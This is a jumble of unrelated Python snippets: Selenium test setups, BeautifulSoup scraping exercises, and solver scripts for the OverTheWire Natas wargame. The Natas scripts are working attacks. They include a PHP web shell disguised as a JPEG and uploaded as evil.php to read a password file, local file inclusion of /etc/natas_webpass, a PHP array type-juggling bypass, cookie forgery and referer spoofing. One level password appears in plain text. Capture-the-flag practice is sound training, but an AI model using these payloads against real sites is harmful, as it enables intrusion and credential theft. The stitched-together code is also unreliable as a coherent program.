def before(): global driver global rows, blogs driver = base.set_browser() base.get_page(driver, page_url) blogs = base.find_element("blogs_list") rows = blogs.find_elements_by_class_name("row") assert "Blogs " in driver.title
def get_random_external_links(home_url): if not home_url: return None bs = get_page(home_url) if not bs: return None external_links = get_external_links(bs, urlparse(home_url).netloc) if not external_links: print('No External Links Found!!, Looking around the site for one') domain = f"{urlparse(home_url).scheme}://{urlparse(home_url).netloc}" internal_link = get_internal_links(bs, domain) if not internal_link: print('No Internal Links Found!!') return None external_link = get_random_external_links( internal_link[random.randint(0, len(internal_link) - 1)] ) return external_link else: return external_links[random.randint(0, len(external_links) - 1)]
def natas24(): username="******" password = "******" content = get_page(24, username, password, "?passwd[]=lol") password = re.search(r"(?<=Password: )\w{32}", content) if password is None: print("Fail to find password") return print(password.group(0))
def natas26(): username = "******" passowrd = "oGgWAJ7zcGT28vYazGo4rkhOPDhBu34T" stdout, stderr = Popen("php natas26.php", shell=True, stdout=PIPE, stderr=PIPE).communicate() if stderr: print("Fail to find password") return drawing = stdout.decode("utf-8").replace("\n", "") cookies = {"drawing": drawing} get_page(26, username, passowrd, cookies=cookies) content = get_page(26, username, passowrd, "img/pass.php") print(content)
def natas7(): username = "******" password = "******" content = get_page(7, username, password, "/index.php?page=/etc/natas_webpass/natas8") password = re.search(r"(?<=<br>\n)\w{32}", content) if password is None: print("Fail to find password") return print(password.group(0))
def natas11(): username = "******" password = "******" stdout, stderr = Popen("php natas11.php", shell=True, stdout=PIPE, stderr=PIPE).communicate() if stderr: print("Fail to find password") return data = stdout.decode("utf-8") cookies = {"data":data} content = get_page(11, username, password, cookies=cookies) password = re.search(r"(?<=The password for natas12 is )\w{32}", content) if password is None: print("Fail to find password") return print(password.group(0))
def natas13(): username = "******" password = "******" _content = b'\xFF\xD8\xFF\xE0<? echo passthru("cat /etc/natas_webpass/natas14"); ?>' data = {"MAX_FILE_SIZE":1000, "filename":"evil.php"} files = {"uploadedfile":("natas13.php", _content)} content = post_page(13, username, password, data=data, files=files) upload_path = re.findall(r"(upload/\S{10}.php)", content) if not upload_path: print("Fail to find password") return else: upload_path = upload_path[0] password_content = get_page(13, username, password, "/"+upload_path, byte=True) print(password_content[4:].decode())
def natas6(): username = "******" password = "******" secret_content = get_page(6, username, password, "/includes/secret.inc") secret = re.search(r"(?<=secret = \")\w+", secret_content) if secret is None: print("Fail to find password") return secret = secret.group(0) data = {"secret": secret, "submit": "Submit"} content = post_page(6, username, password, data=data) password = re.search(r"(?<=The password for natas7 is )\w+", content) if password is None: print("Fail to find password") return print(password.group(0))
def main(): bs = get_page('http://www.pythonscraping.com/pages/page3.html') # Descendants vs Childerens # Children - exactly one tag below parent # Descendants - any level below parent # All children are descendants but not all descendants are children print('------------------Children-------------------') # Get Children for child in bs.find('table', {'id': 'giftList'}).children: print(child) print('------------------Next Siblings-------------------') # Get Next siblings (this print all rows except header 1st one) for sibling in bs.find('table', {'id': 'giftList'}).tr.next_siblings: print(sibling) print('------------------Previous Siblings-------------------') # Get Next siblings (this print none because the selected row is 1st row) for sibling in bs.find('table', {'id': 'giftList'}).tr.previous_siblings: print(sibling) # Dealing with Parents print( bs.find('img', { 'src': '../img/gifts/img1.jpg' }).parent.previous_sibling.get_text()) # Regular Expressions and Beautiful Soup # Take <img src="../img/gifts/img3.jpeg"> # Don't try to get this with help of tag or position use look for file path images = bs.find_all('img', {'src': re.compile('\.\.\/img\/gifts\/img.*\.jpg')}) for image in images: print(image) # Lambda Experession # U can pass lambda expression function as argument to findall function attributes = bs.find_all(lambda tag: len(tag.attrs) == 2) print(20 * '*' + 'Tags with 2 attributest' + 20 * '*' + '\n', attributes)
def get_links(pages, url=''): url = f'http://en.wikipedia.org/{url}' bs_obj = get_page(url) try: print(bs_obj.h1.get_text()) print( bs_obj.find('', { 'id': 'mw-content-text' }).find_all('p')[0].get_text()) print( bs_obj.find('', { 'id': 'ca-edit' }).find('span').find('a').attrs['href']) except AttributeError as e: print('this link is missing something! Continuing') for link in bs_obj.find_all('a', href=re.compile('^(/wiki/)')): if 'href' in link.attrs and link.attrs['href'] not in pages: new_section = link.attrs['href'] print('-' * 30 + '\n' + new_section) pages.add(new_section) get_links(pages, new_section)
# -*- coding: utf-8 -*- from base import get_page import re username = "******" password = "******" cookies = {"loggedin": "1"} content = get_page(5, username, password, cookies=cookies) password = re.search(r"(?<=natas6 is )\w+", content) if password is not None: print(password.group(0)) else: print("Fail to find password")
def before(): global driver driver = base.set_browser() base.get_page(driver, page_url) assert "Alerta" in driver.title
# -*- coding: utf-8 -*- from base import get_page import re username = "******" password = "******" content = get_page(2, username, password, "/files/users.txt") password = re.search(r"(?<=natas3:)\w+", content) if password is not None: print(password.group(0)) else: print("Fail to find password")
# -*- coding: utf-8 -*- from base import get_page import re username = "******" password = "******" content = get_page(3, username, password, "/s3cr3t/users.txt") password = re.search(r"(?<=natas4:)\w+", content) if password is not None: print(password.group(0)) else: print("Fail to find password")
# -*- coding: utf-8 -*- from base import get_page import re username = "******" password = "******" headers = {"Referer": "http://natas5.natas.labs.overthewire.org/"} content = get_page(4, username, password, headers=headers) password = re.search(r"(?<=natas5 is )\w+", content) if password is not None: print(password.group(0)) else: print("Fail to find password")
# -*- coding: utf-8 -*- from base import get_page import re username = "******" password = "******" content = get_page(1, username, password) password = re.search(r"(?<=The password for natas2 is )\w+", content) if password is not None: print(password.group(0)) else: print("Fail to find password")
# CHAPTER 2 - Advanced HTML Parsing from base import get_page bs = get_page('http://www.pythonscraping.com/pages/warandpeace.html') #findall(tag, attribute, recursive, text, limit, keywords) names = bs.findAll('span', {'class': 'green'}) names = {name.get_text() for name in names} for name in names: print(name) """ Other BS Objects Bs object - Instance of BeautifulSoup Tag object - Retrived in list or by calling find and findall functions navigableString object - Used to represent string rather than tag comment object - used to find HTML comments """
def before(): global driver driver = base.set_browser() base.get_page(driver, page_url) assert "Myjobs Visualizer" in driver.title